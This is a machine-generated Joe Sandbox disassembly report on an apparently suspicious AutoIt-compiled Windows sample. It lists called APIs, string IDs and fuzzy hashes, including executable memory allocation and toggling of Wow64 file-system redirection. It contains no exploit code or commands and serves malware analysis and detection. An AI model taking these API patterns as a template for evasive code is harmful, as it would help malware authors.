                                                            • API String ID: 3506404897-1855777976
                                                            • Opcode ID: 50383d618f89eb8b17b91bbbffb9cd8bee096a4f5b7a49ede0194b747bbabd0f
                                                            • Instruction ID: 05e640ca508e22dcb37edbd4611e6955a91702cbcae30c79ee28820b983e065b
                                                            • Opcode Fuzzy Hash: 50383d618f89eb8b17b91bbbffb9cd8bee096a4f5b7a49ede0194b747bbabd0f
                                                            • Instruction Fuzzy Hash: F9218FB0700219EFCF54EF64CC82AAE77FAAF45710F004459F455AB182EB38EA45CB65
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00717772
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00717787
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00717794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: a942ee6c03b28ea51df2b005f5a1607bef0015357620f4d67597400d3fea1afc
                                                            • Instruction ID: babcbe0d720de236d4dc74245e43b257bc8cc787779f1a27883e95c165ade558
                                                            • Opcode Fuzzy Hash: a942ee6c03b28ea51df2b005f5a1607bef0015357620f4d67597400d3fea1afc
                                                            • Instruction Fuzzy Hash: 3F11E372244209BAEF249F69CC05FEB77B9EF89B64F114528FA41A60D0D676E851CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: t$@Bu
                                                            • API String ID: 3494438863-4292462000
                                                            • Opcode ID: a55cf1b64a57c3e924ed8dba2f002283c36e8c65911d541d31b7289e0ac80eb7
                                                            • Instruction ID: 8a805f77bb450edb7d86c20f03994fbe53676ebc07cdf6ae9303e28a1e5e75e8
                                                            • Opcode Fuzzy Hash: a55cf1b64a57c3e924ed8dba2f002283c36e8c65911d541d31b7289e0ac80eb7
                                                            • Instruction Fuzzy Hash: 4DF031F16447129AE7648F54FC61AD627A6F710734F50442AF101CF290EBBC98D18799
                                                            APIs
                                                            • __lock.LIBCMT ref: 006B9B94
                                                              • Part of subcall function 006B9C0B: __mtinitlocknum.LIBCMT ref: 006B9C1D
                                                              • Part of subcall function 006B9C0B: EnterCriticalSection.KERNEL32(00000000,?,006B9A7C,0000000D), ref: 006B9C36
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 006B9BA4
                                                              • Part of subcall function 006B9100: ___addlocaleref.LIBCMT ref: 006B911C
                                                              • Part of subcall function 006B9100: ___removelocaleref.LIBCMT ref: 006B9127
                                                              • Part of subcall function 006B9100: ___freetlocinfo.LIBCMT ref: 006B913B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                            • String ID: 8t$8t
                                                            • API String ID: 547918592-3065990335
                                                            • Opcode ID: d6b7c6015f3c52b941355fb8aa9fc443fe4b549464dbfabb82d8d471a0c3c56d
                                                            • Instruction ID: 4e7995dde0ee44190a2a78204be4845c82225788bf15eb0c0964acc97e8f269c
                                                            • Opcode Fuzzy Hash: d6b7c6015f3c52b941355fb8aa9fc443fe4b549464dbfabb82d8d471a0c3c56d
                                                            • Instruction Fuzzy Hash: 69E046F1982304AAEAA0BBE86903B892766EB01B31F20415EF155560C18B680480C72F
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00694B83,?), ref: 00694C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00694C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 3c6b015efe6d49c4b56cbb365a9c63490eb275954ca024e8dfcb1976bb2f34e7
                                                            • Instruction ID: e870d4c8f9a6260261a9febe8ecc1dc4c97d3f70b181bdebd15605a51007b062
                                                            • Opcode Fuzzy Hash: 3c6b015efe6d49c4b56cbb365a9c63490eb275954ca024e8dfcb1976bb2f34e7
                                                            • Instruction Fuzzy Hash: C1D02B70504B13DFCB204F35D80868673DAAF01340B10C83DD495C67A0EB78C4C0C610
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00694BD0,?,00694DEF,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00694C23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 7933880695b2b2d3cad29b26ec7302e5fc8588dead84d8ed659d1203b8dc4ab6
                                                            • Instruction ID: 0d9edfa39fcf6e09e206f1327efd40ec94edc5041c2a086a121c93242fe89f05
                                                            • Opcode Fuzzy Hash: 7933880695b2b2d3cad29b26ec7302e5fc8588dead84d8ed659d1203b8dc4ab6
                                                            • Instruction Fuzzy Hash: AED0C270501B13DFCB205F74D808686B6DBEF08342B00CC39D485C2690EBB8C481CA10
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00711039), ref: 00710DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00710E07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 0c2b0fb69786d9ccd2c560aaac7e4eaaa3d7716807c763d2df615d335fc2bb25
                                                            • Instruction ID: 6db4f7f789449cd880ac8324d51f08d5beb55ef2529e0693ec08fc8f466d279e
                                                            • Opcode Fuzzy Hash: 0c2b0fb69786d9ccd2c560aaac7e4eaaa3d7716807c763d2df615d335fc2bb25
                                                            • Instruction Fuzzy Hash: E0D0EC70510716DFD7205B79C808687B6D5AF04751F11CC6DE585D21D0D7B8D4E08654
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00708CF4,?,0071F910), ref: 007090EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00709100
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 24060a5ddf1b257b2d9a3cbc78f2c0f09c9c8b372b09460e8610b7d7c98e5dfd
                                                            • Instruction ID: f812044cbc925af3df829f024074600160a2a8efc817926b1f69432d8d11a71d
                                                            • Opcode Fuzzy Hash: 24060a5ddf1b257b2d9a3cbc78f2c0f09c9c8b372b09460e8610b7d7c98e5dfd
                                                            • Instruction Fuzzy Hash: 34D0C7B0610B1BDFCB208F38D80828672E5AF00341B22C83AD486C21D0EBBCC880CA90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 0054bb3cd71ff5d0ddb93c447c85c1e41aea24636814913ed64559ffe0cb9aaa
                                                            • Instruction ID: 699785358dd7ca081da0398280d28fe51c717dbabca8a4709fb4c25a7dee5716
                                                            • Opcode Fuzzy Hash: 0054bb3cd71ff5d0ddb93c447c85c1e41aea24636814913ed64559ffe0cb9aaa
                                                            • Instruction Fuzzy Hash: 38D012B1D04118FACB449B9098888F9777DA70A311F100553F50296261E2B59B96D625
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d48d461c34593fd73d4dbc3fec4a6203cc7486d793842d435b3ed71ce41aeb42
                                                            • Instruction ID: 8f33e704924a17d2d220303683fdc7a883f60017d555e204572ad99df7c6bd68
                                                            • Opcode Fuzzy Hash: d48d461c34593fd73d4dbc3fec4a6203cc7486d793842d435b3ed71ce41aeb42
                                                            • Instruction Fuzzy Hash: 56C15C74A05256EFDB14CFA9C884AAEBBF6FF48704B148598E805DB351D730ED81DB90
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0070E0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 0070E101
                                                              • Part of subcall function 0070D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070D7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0070E301
                                                            • _memmove.LIBCMT ref: 0070E314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: a214710bc4b6c2273f9f6328c85fdb835f996284cd2675d9c3ff7fdd64a145e1
                                                            • Instruction ID: 74076e72ab778611ff0b2a8f86929f809ccaa2e407b3d3e62143d02ffcbbc057
                                                            • Opcode Fuzzy Hash: a214710bc4b6c2273f9f6328c85fdb835f996284cd2675d9c3ff7fdd64a145e1
                                                            • Instruction Fuzzy Hash: CEC16A71608301DFC754DF28C480A6ABBE5FF89714F148A6EF8999B391D734E946CB82
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 007080C3
                                                            • CoUninitialize.OLE32 ref: 007080CE
                                                              • Part of subcall function 006ED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006ED5D4
                                                            • VariantInit.OLEAUT32(?), ref: 007080D9
                                                            • VariantClear.OLEAUT32(?), ref: 007083AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 89a9a14cf6b511096a2507d99096a95bd2fe8b660e8dd6fa83ef241378309b3d
                                                            • Instruction ID: 3d7e97cfddb0f793510a89a841d843039382151e15e52ffdb3c15712ec4e2b64
                                                            • Opcode Fuzzy Hash: 89a9a14cf6b511096a2507d99096a95bd2fe8b660e8dd6fa83ef241378309b3d
                                                            • Instruction Fuzzy Hash: 5FA15975204701DFCB80DF28C481A2AB7E9BF89324F04895CF9959B7A1DB34ED05CB96
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: fabd8e4268ab06f458d0a6aac6244ace41676945dc982707a0dae2696f3814f9
                                                            • Instruction ID: 89cba7b801b27e73cc9918129c46ef3acbb44fab1575222eb87b4e60e3ba5a70
                                                            • Opcode Fuzzy Hash: fabd8e4268ab06f458d0a6aac6244ace41676945dc982707a0dae2696f3814f9
                                                            • Instruction Fuzzy Hash: 8B510974B013819EDF60AF6AC89167AB7E7AF24350F20D82FF586DB291EB34D8418715
                                                            APIs
                                                            • GetWindowRect.USER32(00D2EF50,?), ref: 00719863
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00719896
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00719903
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: 51995a103ccd57ef1a8e556334e8747866ac2a877999a33aec2472706b7506fb
                                                            • Instruction ID: 045b959b995ab39481ef4c65b64c0a53d6c1488c8f7ba9625db52b3ee9b14a2e
                                                            • Opcode Fuzzy Hash: 51995a103ccd57ef1a8e556334e8747866ac2a877999a33aec2472706b7506fb
                                                            • Instruction Fuzzy Hash: ED513D34A00209EFCF14CF68C894AEE7BB5FF95360F148169F9559B2A0D735AD82CB90
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 006E9AD2
                                                            • __itow.LIBCMT ref: 006E9B03
                                                              • Part of subcall function 006E9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 006E9DBE
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 006E9B6C
                                                            • __itow.LIBCMT ref: 006E9BC3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: b630ded3fe0844c45e7fc474a08b4091ec98205b86975ec458bd1cac5591380e
                                                            • Instruction ID: be4ea1fe2da74c735e974d69b75ce87dc9b90494776bf000f180fdd8740b5985
                                                            • Opcode Fuzzy Hash: b630ded3fe0844c45e7fc474a08b4091ec98205b86975ec458bd1cac5591380e
                                                            • Instruction Fuzzy Hash: EF418F70A00349ABDF25EF65D846BFE7BBAEF44720F000069F905A7391DB709A45CBA5
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 007069D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 007069E1
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00706A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00706A51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: 9b7f9bf6eb2b4d889111cc0abdfe972605732129466c4eaa9c27f7f473d5c24f
                                                            • Instruction ID: 0c3fd4bd8dfea33ec09e1de9952ea5c52d5e91719e0aa88169ac1b9bf5140ea8
                                                            • Opcode Fuzzy Hash: 9b7f9bf6eb2b4d889111cc0abdfe972605732129466c4eaa9c27f7f473d5c24f
                                                            • Instruction Fuzzy Hash: 0B418F75740200AFEBA0AF28CC86F7A77E99F45B14F04C51CFA19AB6C2DA749D008795
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0071F910), ref: 007064A7
                                                            • _strlen.LIBCMT ref: 007064D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: a3d284da022b16028a0ce4a0c5fa4092f2ac464f5ff4805dd2ea213e2b690434
                                                            • Instruction ID: ad957b9b24fd16e269dd65c79bb3bc8aafffd617669aef31e13176eb7969c034
                                                            • Opcode Fuzzy Hash: a3d284da022b16028a0ce4a0c5fa4092f2ac464f5ff4805dd2ea213e2b690434
                                                            • Instruction Fuzzy Hash: EE419571600104EBCB54EBA8DC95EBEB7EAAF04310F14825DF915972D6DB34AD10C754
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006FB89E
                                                            • GetLastError.KERNEL32(?,00000000), ref: 006FB8C4
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006FB8E9
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006FB915
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 8d1c4a6eee54dbf7e8e7dd28da894645d2828607a39d6c2e7ce4bc898f670fda
                                                            • Instruction ID: e5d07dc3d16c9c316e5520a74f4527a0fa7addc5a0b52409e1f75df7390d07d3
                                                            • Opcode Fuzzy Hash: 8d1c4a6eee54dbf7e8e7dd28da894645d2828607a39d6c2e7ce4bc898f670fda
                                                            • Instruction Fuzzy Hash: A0412A39600514DFCF50EF28C585A59BBEAAF4A310F09849CED4A9B762DB34FD01CBA5
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007188DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
